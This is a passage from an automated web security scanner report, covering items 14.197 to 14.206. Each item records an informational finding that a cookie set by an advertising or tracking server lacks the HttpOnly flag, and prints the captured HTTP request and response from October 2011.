The following cookie was issued by the application and does not have the HttpOnly flag set (see the response's Set-Cookie headers below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x914r7675757 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/ROne/ro_x914.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 248
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Tue, 02-Oct-2012 01:52:56 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=FDX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Mon, 03-Oct-2016 01:52:56 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><!-- PubMatic- Exclude user - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MiZjb2RlPTIwNTQmdGw9NTE4NDAw
' width='1' height
...[SNIP]...

14.197. http://safebrowsing.clients.google.com/safebrowsing/downloads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the response's Set-Cookie header below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=14.0.835.187&pver=2.2&wrkey=AKEgNitErWf0UFLnRnw3Az6mp57JIWbOiz4iR9gNFsjxTOQfoHIRqIpBEuaneWSYfX0d7kUgr1D2W0FMpF_cHSqPs9XEwGa4Xg== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Length: 195
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch

goog-malware-shavar;a:37678-51238:s:50280-62140:mac
goog-phish-shavar;a:154883-165954:s:77359-81359:mac
goog-badbinurl-shavar;a:137-2537:s:61-2536:mac
goog-badbin-digestvar;a:19-1911:s:3-397:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=3dfb46e0dc07a7d7:TM=1317604332:LM=1317604332:S=S2Ouy3CEy9MxV-6M; expires=Wed, 02-Oct-2013 01:12:12 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:12:12 GMT
Server: Chunked Update Server
Content-Length: 686
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Expires: Mon, 03 Oct 2011 01:12:12 GMT
Cache-Control: private

m:Tr-1oiyw-IJER2A0oBF6b_mKSpU=
n:1890
i:goog-badbin-digestvar
i:goog-badbinurl-shavar
i:goog-malware-shavar
u:safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYveUDINDlAyoH
...[SNIP]...

14.198. http://sales.liveperson.net/hc/15744040/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/15744040/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the response's Set-Cookie headers below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/15744040/?&site=15744040&cmd=mTagKnockPage&lpCallId=482200729660-510428063105&protV=20&lpjson=1&id=2559909213&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-hotel-obtz3-english%7ClpMTagConfig.db3%7ClpButtonDiv3%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1317600745459; expires=Tue, 04-Oct-2011 00:12:25 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 03 Oct 2011 00:12:25 GMT
Set-Cookie: HumanClickSiteContainerID_15744040=STANDALONE; path=/hc/15744040
Set-Cookie: LivePersonID=-5110247826455-1317600658:-1:1317600658:-1:-1; expires=Tue, 02-Oct-2012 00:12:25 GMT; path=/hc/15744040; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1510

lpConnLib.Process({"ResultSet": {"lpCallId":"482200729660-510428063105","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

14.199. http://serve.williamhill.com/promoLoadDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serve.williamhill.com
Path:   /promoLoadDisplay

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promoLoadDisplay?member=goalcom&campaign=DEFAULT&channel=widget&zone=593986973&lp=0 HTTP/1.1
Host: serve.williamhill.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NON DEVa TAIa OUR BUS"
Set-Cookie: IMPRESSION=45034F96A3F22660E679EB55524B11CD:27523; Expires=Mon, 03-Oct-2011 23:52:05 GMT
Location: http://cacheserve.williamhill.com/promoDisplay?promoId=593986972
Content-Type: text/html; charset=utf-8
Content-Length: 0


14.200. http://servedby.flashtalking.com/click/1/16628

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /click/1/16628

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/1/16628;183799;231524;211;162480/?g=1343AC00FD7B0F&random=1244&ft_sgid=542&url=http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)"

Response

HTTP/1.1 302 Found
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:1-t:13702351)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:58:02 GMT
Cache-Control: no-cache, no-store
Content-Length: 0
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Via: 1.1 sjc005200 (MII-APC/2.1)
Content-Type: text/plain


14.201. http://servedby.flashtalking.com/imp/1/16628

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/1/16628

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp/1/16628;183799;201;js;BarclaysPremierLeague;RONMPU/?click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=742186.0483009368 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=1343AC00FD7B0F|segment=(adg-t:1343)|f20004352=(s:2-t:13702351)";Path=/;Domain=flashtalking.com;Expires=Tue, 01-Oct-13 23:53:28 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 02 Oct 2011 23:53:28 GMT
Server: Jetty(6.1.22)
Content-Type: text/javascript
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 582


var ftGUID_183799="1343AC00FD7B0F";
var ftConfID_183799="162490";
var ftParams_183799="click=http://adserver.adtech.de/adlink|327|2816969|0|170|AdId=6109710;BnId=113;itime=599458642;nodecode=yes;li
...[SNIP]...

14.202. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4_0&hotel=omni_hotels&random=656365&tile=564238840132219&section=detailskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A11%3A12&ranreq=0.7082862977404147&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26072=823-2:1098-2

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:12:49 GMT
Content-Length: 1910
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:12:49 GMT; path=/
Set-Cookie: _curtime=1317600769; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:22:49 GMT; path=/
Set-Cookie: camfreq_749312571=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:52:49 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:12:49 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAATw4AABEdAAAAAAAAA
...[SNIP]...

14.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&prevkadIds=21557&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.igougo.com/about/&frameName=http_www_igougo_comaboutkomli_ads_frame22662026621&kltstamp=2011-9-2%2020%3A53%3A2&ranreq=0.7874341141432524&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x39&adVisibility=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_200=3683-d0f5e0cea474; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; pubfreq_26072=823-3:1098-3; KRTBCOOKIE_16=226-uid:3620501663059719663; PUBMDCID=1; pubfreq_26621=; pubtime_26621=TMC; pubfreq_26621_21557_1687682837=559-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; DPPIX_ON=YES; KRTBCOOKIE_218=4056--5675633421699857517=; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 01:52:59 GMT
Content-Length: 1734
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 01:52:58 GMT; path=/
Set-Cookie: pubfreq_26621_21556_1478501671=559-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 02:32:59 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 01:52:59 GMT; path=/

document.write('<div id="http_www_igougo_comaboutkomli_ads_frame22662026621" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=/GcAAP1nAAA0VAAAAAA
...[SNIP]...

14.204. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21043&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A1&ranreq=0.3272909566294402&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1903
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: _curtime=1317600551; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:19:11 GMT; path=/
Set-Cookie: camfreq_60531448=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: pubfreq_26072_21043_312218146=243-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAAzUgAATw4AAA8dAAAAAAAAA
...[SNIP]...

14.205. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21043&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A13%3A21&ranreq=0.6788685892242938&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PMDTSHR=cat:; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; PUBMDCID=1; KTPCACOOKIE=YES; pubfreq_26072=823-3:1098-3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1903
Date: Mon, 03 Oct 2011 00:14:32 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:14:32 GMT; path=/
Set-Cookie: _curtime=1317600872; domain=pubmatic.com; expires=Mon, 03-Oct-2011 01:24:32 GMT; path=/
Set-Cookie: camfreq_1933189234=3663-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:54:32 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:14:32 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAAzUgAATw4AAA8dAAAAAAAAA
...[SNIP]...

14.206. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26620&siteId=26621&adId=21556&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags266202662121556559adtag_htmlkomli_ads_frame12662026621&kltstamp=2011-9-2%2020%3A53%3A10&ranreq=0.35609531262889504&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
